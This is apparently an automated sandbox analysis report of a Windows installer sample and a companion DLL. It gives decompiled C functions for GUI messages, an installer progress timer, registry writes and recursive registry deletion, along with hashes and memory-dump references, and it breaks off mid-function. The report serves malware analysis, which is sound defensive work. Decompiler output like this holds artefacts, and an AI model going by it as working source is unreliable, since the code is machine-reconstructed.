                • Instruction ID: 358ee884f5ff10d428371a1b62bba1d30437c1ab4e604d63c16654b23032d712
                • Opcode Fuzzy Hash: 385e9128b9c0d01ad50738c4d29d6e46be301be91b5c894471ccb04886c564e9
                • Instruction Fuzzy Hash: 2021A2B5A11108EFDB00DFA8D501B9E7BB4BF49314F148259F83ADB344EB71AA40CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                0x00404761
                0x0040476e
                0x00404774
                0x004047b2
                0x004047b2
                0x004047c1
                0x004047c8
                0x00000000
                0x004047ca
                0x00404776
                0x00404785
                0x0040478d
                0x00404790
                0x004047a2
                0x004047a8
                0x004047af
                0x00000000
                0x004047af
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x2b400
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                0x00402b7b
                0x00402b89
                0x00402b8f
                0x00402b8f
                0x00402b9d
                0x00402b9f
                0x00402ba5
                0x00402bac
                0x00402bae
                0x00402bae
                0x00402bc4
                0x00402bd4
                0x00402be6
                0x00402be6
                0x00402bee

                APIs
                • SetTimer.USER32 ref: 00402B89
                • MulDiv.KERNEL32(0002B400,00000064,?), ref: 00402BB4
                • wsprintfA.USER32 ref: 00402BC4
                • SetWindowTextA.USER32(?,?), ref: 00402BD4
                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                Strings
                • verifying installer: %d%%, xrefs: 00402BBE
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: verifying installer: %d%%
                • API String ID: 1451636040-82062127
                • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81D50, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E6FF81D50(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a8 < 0xfffffff9 || _a8 > 7) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbd;
					} else {
						 *((intOrPtr*)(_v8 + 0x10)) = _a8;
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
			}




                0x6ff81d57
                0x6ff81d63
                0x6ff81d70
                0x6ff81d7a
                0x6ff81d8c
                0x00000000
                0x6ff81d99
                0x6ff81d9d
                0x6ff81daa
                0x00000000
                0x6ff81db7
                0x6ff81dbd
                0x6ff81dc5
                0x00000000
                0x6ff81dcb
                0x6ff81d9d

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D70
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D8C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81DAA
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81DC5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: 9317352c0a7d5d4de00f25228884118ec56972fdd8cc1cd13bbef37dcd8f59fb
                • Instruction ID: 0e41a0490ce1e7b7ef196440c0db0a6fcf9247455de27b98c55010cb508b2a3d
                • Opcode Fuzzy Hash: 9317352c0a7d5d4de00f25228884118ec56972fdd8cc1cd13bbef37dcd8f59fb
                • Instruction Fuzzy Hash: 8F014B76511608EFCB04DF98C909BAD7BB4BF0A325F118255F8368A390E7719A40CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF819A0, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF819A0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				intOrPtr _t44;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t65;

				_v8 = _a4;
				0x6ff80000("%p %p %p\n", _a4, _a8, _a12, __ecx);
				if(_a12 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						 *_a12 =  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_a12 + 4)) =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_a12 + 8)) =  *((intOrPtr*)(_v8 + 0x2c));
						_t64 = _a12;
						_t44 = _v8;
						 *((intOrPtr*)(_t64 + 0x10)) =  *((intOrPtr*)(_t44 + 0x38));
						 *((intOrPtr*)(_t64 + 0x14)) =  *((intOrPtr*)(_t44 + 0x3c));
						_t58 = _a12;
						_t65 = _v8;
						 *((intOrPtr*)(_t58 + 0x18)) =  *((intOrPtr*)(_t65 + 0x40));
						 *((intOrPtr*)(_t58 + 0x1c)) =  *((intOrPtr*)(_t65 + 0x44));
						 *((intOrPtr*)(_a12 + 0x20)) = 1;
						if(_a8 != 0) {
							 *_a8 =  *((intOrPtr*)(_v8 + 8));
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}








                0x6ff819a7
                0x6ff819bb
                0x6ff819c7
                0x6ff819d8
                0x6ff819e2
                0x6ff819f4
                0x00000000
                0x6ff81a01
                0x6ff81a0a
                0x6ff81a15
                0x6ff81a21
                0x6ff81a24
                0x6ff81a27
                0x6ff81a2d
                0x6ff81a33
                0x6ff81a36
                0x6ff81a39
                0x6ff81a3f
                0x6ff81a45
                0x6ff81a4b
                0x6ff81a56
                0x6ff81a61
                0x6ff81a61
                0x6ff81a68
                0x00000000
                0x6ff81a6e
                0x6ff819e2
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF819D8
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF819F4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p %p$1HDP$p-w
                • API String ID: 3168844106-1182936200
                • Opcode ID: 8779ea1f3386cd35943b920ee892a5cfe562accf4a78b67c981a174bd7388096
                • Instruction ID: bafff0fe1a5e13d61a0074f1e97af541ed4c88eea41878437512ca13e34a9e12
                • Opcode Fuzzy Hash: 8779ea1f3386cd35943b920ee892a5cfe562accf4a78b67c981a174bd7388096
                • Instruction Fuzzy Hash: 933194B8605249DFCB04CF58C580A9ABBB1FF49314F21869AEC298B351D771EE91CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81A80, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF81A80(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff80000("%p 0x%08x %p %p %p\n", _a4, _a8, _a12, _a16, _a20);
				if(_a20 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_push(_a20);
						_push(_a16 + 0x18);
						_push(_a12 + 0x18);
						_push(_a8);
						_v12 = E6FF82E80(_v8);
						LeaveCriticalSection(0x6ff850ac);
						return _v12;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff81a89
                0x6ff81aa5
                0x6ff81ab1
                0x6ff81abf
                0x6ff81ac9
                0x6ff81adb
                0x00000000
                0x6ff81ae8
                0x6ff81aeb
                0x6ff81af2
                0x6ff81af9
                0x6ff81afd
                0x6ff81b0a
                0x6ff81b12
                0x00000000
                0x6ff81b18
                0x6ff81ac9
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81ABF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81ADB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p 0x%08x %p %p %p$1HDP$p-w
                • API String ID: 3168844106-3684456673
                • Opcode ID: 40563b7ef54df2a57334cd98b90d399a61d98345b451711807388f2cb7c96a28
                • Instruction ID: 8e7ac4945cc01ebde8e76ba8f4805465fa5d5ab7d2bbf9f337bba271c45fb254
                • Opcode Fuzzy Hash: 40563b7ef54df2a57334cd98b90d399a61d98345b451711807388f2cb7c96a28
                • Instruction Fuzzy Hash: A0112AB6A00209EFCB00DF9CD981E9E3BB9BF49315F108249F9259B351D730A960CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82A30, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF82A30(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				intOrPtr* _t21;
				intOrPtr _t23;

				_v8 = _a4;
				0x6ff80000("%p %p\n", _a4, _a8, __ecx);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_t21 = _a8;
						_t23 = _v8;
						 *_t21 =  *((intOrPtr*)(_t23 + 0x20));
						 *((intOrPtr*)(_t21 + 4)) =  *((intOrPtr*)(_t23 + 0x24));
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}






                0x6ff82a37
                0x6ff82a47
                0x6ff82a53
                0x6ff82a61
                0x6ff82a6b
                0x6ff82a7d
                0x00000000
                0x6ff82a8a
                0x6ff82a8a
                0x6ff82a8d
                0x6ff82a93
                0x6ff82a98
                0x6ff82aa0
                0x00000000
                0x6ff82aa6
                0x6ff82a6b
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A61
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$1HDP$p-w
                • API String ID: 3168844106-2469439903
                • Opcode ID: 153bd987c5199ca854553bb16eb3b01ad093b73ffffcdaed60d36cd15477f3b7
                • Instruction ID: 7daca4c710bd2feb2f416a34e389d2a7746aac934a1a986fc0d86f17068c23df
                • Opcode Fuzzy Hash: 153bd987c5199ca854553bb16eb3b01ad093b73ffffcdaed60d36cd15477f3b7
                • Instruction Fuzzy Hash: 24012875611108EFCB00CF98D501B5D7BB5FF4A325F218195F8298B300D732AA41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF816E0, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF816E0(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					0x6ff80000(6);
					E6FF82C10(_v8);
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}




                0x6ff816e7
                0x6ff816f3
                0x6ff81700
                0x6ff8170a
                0x6ff8171c
                0x00000000
                0x6ff81729
                0x6ff8172b
                0x6ff81737
                0x6ff81744
                0x00000000
                0x6ff8174a

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81700
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8171C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81744
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: 0001071671235e8000d58f00252c42d68f63b21ff0a6be54bf63dbd18eff3b47
                • Instruction ID: adddebd697904a7128d75ab29998cae5d3527a1dd3a93d5417fd92b198163e40
                • Opcode Fuzzy Hash: 0001071671235e8000d58f00252c42d68f63b21ff0a6be54bf63dbd18eff3b47
                • Instruction Fuzzy Hash: 5BF0B4B6911208EFDB00DBD4D905B5E7BB8BF06325F214164F83597341E772AA50C692
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81760, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF81760(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					_push(_v8);
					E6FF82EB0(_v8);
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}




                0x6ff81767
                0x6ff81773
                0x6ff81780
                0x6ff8178a
                0x6ff8179c
                0x00000000
                0x6ff817a9
                0x6ff817ac
                0x6ff817ad
                0x6ff817ba
                0x00000000
                0x6ff817c0

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81780
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8179C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF817BA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$0HDP$p-w
                • API String ID: 2978645861-675403308
                • Opcode ID: da8da111251ea0f39ddb65e0147ea113eb9f067b695bf7acd7e4908e3c2cb733
                • Instruction ID: c11102cef70b8846710209a50b22d6475f178ca8300329cf6fa1eadb272dca71
                • Opcode Fuzzy Hash: da8da111251ea0f39ddb65e0147ea113eb9f067b695bf7acd7e4908e3c2cb733
                • Instruction Fuzzy Hash: 56F082B5911108EFCB00DBD8D905A9E7BB8BF06325F204269F8359B340E7726A50CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82440, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E6FF82440(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr* _a16) {
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t58;
				void* _t60;

				_t31 = _a4;
				0x6ff80000(_t31, _a8, _a12, _a16);
				0x6ff80000("%s %d %p %p\n", _t31);
				_t60 = _t58 + 0x18;
				if(_a4 == 0) {
					if(_a12 == 0 || _a16 == 0) {
						return 0xc0000bbd;
					} else {
						if(_a8 != 0) {
							_v8 = 0;
							while(1) {
								0x6ff80000(0x6ff84170);
								_t60 = _t60 + 4;
								if(_v8 >= _t31) {
									break;
								}
								_t14 = (_v8 << 5) + 0x6ff84170; // 0x6
								_t31 =  *_t14;
								if(_t31 != _a8) {
									_v8 = _v8 + 1;
									continue;
								}
								_t17 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
								_v12 =  &((wcsrchr( *_t17, 0x5c))[0]);
								_v16 = lstrlenW(_v12) + 1;
								if( *_a16 >= _v16) {
									lstrcpyW(_a12, _v12);
									_v20 = 0;
								} else {
									_v20 = 0x800007d2;
								}
								 *_a16 = _v16;
								return _v20;
							}
							return 0xc0000bbd;
						}
						return 0;
					}
				}
				0x6ff80000("remote machine not supported\n");
				return 0x800007d0;
			}










                0x6ff82452
                0x6ff82456
                0x6ff82464
                0x6ff82469
                0x6ff82470
                0x6ff8248d
                0x00000000
                0x6ff8249f
                0x6ff824a3
                0x6ff824ac
                0x6ff824be
                0x6ff824c3
                0x6ff824c8
                0x6ff824ce
                0x00000000
                0x00000000
                0x6ff824d6
                0x6ff824d6
                0x6ff824df
                0x6ff824bb
                0x00000000
                0x6ff824bb
                0x6ff824e9
                0x6ff824fc
                0x6ff8250c
                0x6ff82517
                0x6ff8252a
                0x6ff82530
                0x6ff82519
                0x6ff82519
                0x6ff82519
                0x6ff8253d
                0x00000000
                0x6ff8253f
                0x00000000
                0x6ff82549
                0x00000000
                0x6ff824a5
                0x6ff8248d
                0x6ff82477
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %s %d %p %p$remote machine not supported
                • API String ID: 0-1546047983
                • Opcode ID: b90bcf01522cfceac5853696da31d3b4955c124b7a27fcfe097ebeccdb004bed
                • Instruction ID: 79de6144bbd7d9396980f8bb188bf570c4fa22701763dfa9cd94d90fb42b0fa8
                • Opcode Fuzzy Hash: b90bcf01522cfceac5853696da31d3b4955c124b7a27fcfe097ebeccdb004bed
                • Instruction Fuzzy Hash: 7A315CB1A44208EFDB00CF98D984B9E77B4FF45308F508559E835AB345D376BA50CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                0x00402337
                0x0040233c
                0x00402346
                0x00402350
                0x00402353
                0x0040235d
                0x0040236d
                0x00402374
                0x0040237c
                0x0040238a
                0x0040238e
                0x00402399
                0x00402399
                0x0040239d
                0x004023a1
                0x004023a7
                0x004023ac
                0x004023ac
                0x004023b0
                0x004023bc
                0x004023bc
                0x004023d5
                0x004023d7
                0x004023d7
                0x004023da
                0x004024b0
                0x004024b0
                0x004028c1
                0x004028cd

                APIs
                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateValuelstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp
                • API String ID: 1356686001-1968215231
                • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                0x00402a79
                0x00402a8a
                0x00402a92
                0x00402aba
                0x00402aa1
                0x00402aa4
                0x00402af4
                0x00402afa
                0x00402afc
                0x00000000
                0x00402afc
                0x00402ab1
                0x00402ab6
                0x00402ab8
                0x00000000
